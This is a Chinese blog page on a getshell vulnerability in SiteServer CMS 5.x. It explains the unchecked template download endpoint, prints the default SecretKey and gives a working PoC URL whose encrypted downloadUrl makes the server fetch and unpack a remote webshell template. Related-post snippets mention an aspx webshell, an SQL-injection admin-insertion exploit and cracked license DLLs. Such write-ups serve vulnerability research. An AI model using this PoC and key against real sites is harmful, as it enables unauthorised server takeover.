siteservercms 缺点_Siteserver CMS 远程模板下载Getshell漏洞

最新推荐文章于 2022-11-07 10:58:00 发布
最新推荐文章于 2022-11-07 10:58:00 发布
阅读量1.2k 收藏
点赞数
文章标签: siteservercms 缺点
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39576149/article/details/113540971
版权

SiteServerCMS-Remote-download-Getshell-vulnerability

SiteServerCMS 远程模板下载Getshell漏洞

avatar

漏洞缺陷是由于后台模板下载位置未对用户权限进行校验,且 ajaxOtherService中的downloadUrl参数可控,导致getshell,目前经过测试发现对5.0版本包含5.0以下通杀.先调用了DecryptStringBySecretKey函数将downloadurl先进行了解密,之后调用SiteTemplateDownload函数进行模板下载并自解压。

且SecretKey在5.0是默认值

vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5

References

Author:1u0hun

简记野生应急捕获到的siteserver远程模板下载Getshell漏洞

Affected Version

SiteServerCMS 5.x

SiteServerCMS 4.x(测试没通过)

PoC

Author:We1h0@PoxTeam

http://localhost/SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=aZlBAFKTavCnFX10p8sNYfr9FRNHM0slash0XP8EW1kEnDr4pNGA7T2XSz0yCY0add0MS3NiuXiz7rZruw8zMDybqtdhCgxw7u0ZCkLl9cxsma6ZWqYd0G56lB6242DFnwb6xxK4AudqJ0add0gNU9tDxOqBwAd37smw0equals00equals0&director

最低0.47元/天 解锁文章
weixin_39576149
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
siteserver远程模板下载Getshell漏洞
Jiajiajiang_的博客
03-28 4257
此处不做分析,只做漏洞的复现。 参考:https://www.freebuf.com/articles/web/195105.html 准备工作: 需要一台公网服务器,一个有漏洞的站点(肯定的对8)。 第一步 先写一个马,此处是aspx站点,自然是aspx的马,但因为会有拦截等,所以构造如下的马。 <%@ Page Language="Jscript" Debug=true%&...
SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法
收集盒 Book box
11-18 1222
今天特别发现SiteServe CMS( 3.4.4 )网站根目录多了一个asp文件,我就意识网站可以被挂马了!马上排查,终于在后台发现多了一个blue用户名的超级管理员。我猜想可能是SiteServe CMS系统有漏洞,上网一查,果然把到一堆“SiteServer 3.4.4 逻辑漏洞导致SQL注入”的文章。 ----------------------------------------
siteserver cms 3.4.5+iis6.0 漏洞及修复
weixin_34332905的博客
12-22 265
但是经过我本机测试发现只有xxx.asp的文件夹才能利用这个漏洞!此漏洞跟原来的漏洞 手法非常相似!满足两个条件 系统开放注册 iis6注册账户->文档附件管理->上传文件 我们新建一层目录 当然 之前是可以建立*.asp的目录 在3.4.5中已经过滤我们还是建立一层目录! 名字任意这个时候我们上传文件 结果发现 上传jp...
SiteServer CMS 3.6.3 破解
07-11
SiteServer CMS 3.6.3版本,爆破,将BaiRong.Core.dll文件直接替换到bin目录即可,CMS测试通过,其他未测试,理论上都没有问题。仅用于测试,不可用于商业用途。
SiteServer CMS 0Day
p656456564545的专栏
01-09 2778
经测试秒杀最新的3.5版   EXP: 直接访问UserCenter/login.aspx 用户名处输入: 123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypte
SiteServer CMS 3.6 破解 dll
11-04
将BaiRong.Core.dll文件直接替换到bin目录即可,CMS测试通过,其他未测试,理论上都没有问题。
SiteServer CMS-.net
06-14
5、丰富优质模板 一键安装模板是构建完整CMS生态不可或缺的一部分,“做精美模板,立行业标杆”一直是SiteServer CMS追求的目标。目前,SiteServer CMS为用户新上了了几十套的高质量的响应式免费网站模板,未来还会...
SiteServer CMS源代码
03-18
查看安装过程SiteServer CMS v3.4.3 安装调试 SiteServer CMS 是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。 SiteServer...
SiteServer CMS v4.1.1601
12-06
SiteServer CMS 是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。 SiteServer CMS 是基于微软.NET 平台开发的网站内容管理...
SiteServer CMS v6.0 预览版
11-07
SiteServer CMS 是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。 2018年2月1日,SiteServer
SiteServer CMS 3.6.4 破解
01-02
SiteServer CMS 3.6.4版本,爆破,将BaiRong.Core.dll文件直接替换到bin目录即可,CMS测试通过,其他未测试,理论上都没有问题。仅用于测试,不可用于商业用途。
SiteServer CMS 6.15.51 安装包
05-01
SiteServer CMS是中国.NET平台CMS系统创始者,同时也是一款开源免费的企业级CMS系统,SiteServer CMS是.NET平台下最强大的企业级开源免费CMS内容管理系统和网站群系统,能以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。 SiteServer CMS 6.15.51 安装包 更新日志:2020-05-31 新版本素材库图片无法删除;素材库管理,移动分组,提示错误;素材库管理预览某个图片素材时不是显示该素材,而是从头一张逐一开始,这样素材多了预览就无法用了;素材库管理上传图片后默认都存放在/SiteFiles/Library/images/目录下,并且每张图片占用一个文件夹;列表翻页以后再编辑,编辑完毕会自动回到第一页;后台闪退,哪怕后台不设置自动退出,不更新后台的一些操作,也会出偶尔出现闪退问题;6.14.0调用api报404获取站点内容列表API 失效;素材库管理,导入word,图文的图片路径不正确;素材库管理,新建图文无法保存;整体全局搜索的速度需要再次优化;在内容管理中,增加当前栏目的搜索功能;需要支持老版本stl:search标签的isDefaultDisplay属性;素材库编辑器时间长了会提示无法使用问题。
SiteServer CMS 5.0 安装包
02-05
官方提供的最新版本是SiteServer5.0安装包。本文是以全新安装SiteServer为例,所以需要下载安装包,注意不是升级包。 需要的小伙快来CSDN下载吧!
SiteServer CMS 动易内容管理系统 v6.0 正式版
11-07
SiteServer CMS 是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。 2018年2月1日,SiteServer
SiteServer XSS 后台绕过登陆 遍历文件漏洞
收集盒 Book box
05-16 1878
首先注入 这个比较关键 用户登录后会产生3个COOKIE 一个是SESSIONID 一个是 AUTH (这个是啥,随便改就可以的) 一个是记录用户名的 问题就出在这里了,大部分的功能都是设计到用户名而且都是从COOKIE里查看的 所以注入就产生了 在 用户名上 登录后 修改COOKIE 刷新下 注入出现了 没有过滤COOKIE的值 导致注入 论坛XSS 由于以上漏洞
SiteServer cms 授权破解教程
热门推荐
诗墨云淡
05-03 1万+
声明:本文只供研究使用,若产生纠纷,与本文作者无关!请大家积极遵守互联网产权!  如果是懒人的话,直接移步下载我写好的:http://download.csdn.net/detail/fengruochen966/4274681   SiteServer cms采用的是des加密授权,本人已破解授权DLL和授权文件。本文教程主要教大家使用des加密来实现自主授权 首先新建DESEncryp
学习笔记-.net安全之SiteServer远程下载分析
人饭子的博客
11-07 498
0x00 简介 在N年前有个siteserver远程getshell,其实这个洞很简单,问题出在下载模板这里。 找个低版本4.5左右的siteserver下载 0x01 漏洞成因 POC 192.168.110.129:8081/siteserver/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=h...
SiteServer CMS 后台操作系统操作说明
小歆歆的学习笔记
06-17 4654
SiteServer CMS 后台操作系统操作说明 1. 系统页面简介 在下图中可以看到SiteServer CMS的系统管理界面,图中上侧横向菜单是系统功能菜单,针对的是整个系统内所有网站的管理。 图中左侧是针对单个网站的功能菜单,包裹信息管理、显示管理、设置管理和生成管理。 图中右侧是点击左侧菜单后进入的功能操作界面。 2. 栏目管理 位置:信息管理-----> 栏目管理。 1)添...
siteserver cms v6
最新发布
09-17
SiteServer CMS V6是一款功能强大的内容管理系统。它是基于.NET技术开发的,具有开源、高效、安全等优点。 SiteServer CMS V6提供了丰富的功能和灵活的模块化架构,可以满足不同网站的需求。它支持多种内容类型,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值